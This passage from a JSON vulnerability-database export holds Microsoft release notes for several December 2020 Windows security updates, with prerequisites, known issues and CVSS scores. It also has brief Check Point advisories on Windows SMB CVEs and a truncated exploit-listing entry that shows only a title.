files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592468>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592468](<https://download.microsoft.com/download/a/9/e/a9eb1736-3a9b-47c5-a099-6c0e28deec03/4592468.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592468 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592468", "href": "https://support.microsoft.com/en-us/help/4592468", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:00", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586827](<https://support.microsoft.com/help/4586827>) (released November 10, 2020) and addresses the following issues:\n\n * Security updates to Windows Graphics, Windows Peripherals, Windows Storage and Filesystems, and Windows File Server and Clustering.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege. \n * Perform the operation from a node that doesn\u2019t have CSV ownership. \nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the _latest_ SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592471>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592471](<https://download.microsoft.com/download/8/9/3/893b74d6-697d-4b96-ab07-845663edc238/4592471.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592471 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592471", "href": "https://support.microsoft.com/en-us/help/4592471", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:02", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to the Microsoft Graphics Component, Windows Media, Windows Fundamentals, and Windows Virtualization.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4467684, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.| This issue is resolved in KB4601318. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4576750) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4593226>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4593226](<https://download.microsoft.com/download/b/f/9/bf9f9ea6-7185-4cfc-9628-7e549d98fd45/4593226.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4593226 (OS Build 14393.4104) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4593226", "href": "https://support.microsoft.com/en-us/help/4593226", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:40", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the _latest_ SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592504>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592504](<https://download.microsoft.com/download/4/8/3/4831732e-18bd-4b57-a883-4b87c74aecda/4592504.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592504 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2020-12-08T08:00:00", "id": "KB4592504", "href": "https://support.microsoft.com/en-us/help/4592504", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:01", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586807](<https://support.microsoft.com/help/4586807>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the _latest_ SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592498>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592498](<https://download.microsoft.com/download/d/8/3/d8307ad9-933a-4a91-a808-6d2a1927123c/4592498.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592498 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2020-12-08T08:00:00", "id": "KB4592498", "href": "https://support.microsoft.com/en-us/help/4592498", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:36", "description": "An information disclosure vulnerability has been reported in the SMBv2 component of Microsoft Windows SMB server. The vulnerability is due to improper handling of SMB2_SET_INFO messages. A remote, authenticated attacker can exploit this vulnerability by sending crafted SMBv2 messages to the target server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Server Information Disclosure (CVE-2020-17140)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1272", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:36:37", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Remote Code Execution (CVE-2020-17096)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1250", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-17T17:47:58", "description": "# CVE-2020-17136\nCVE-2020-17136 explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 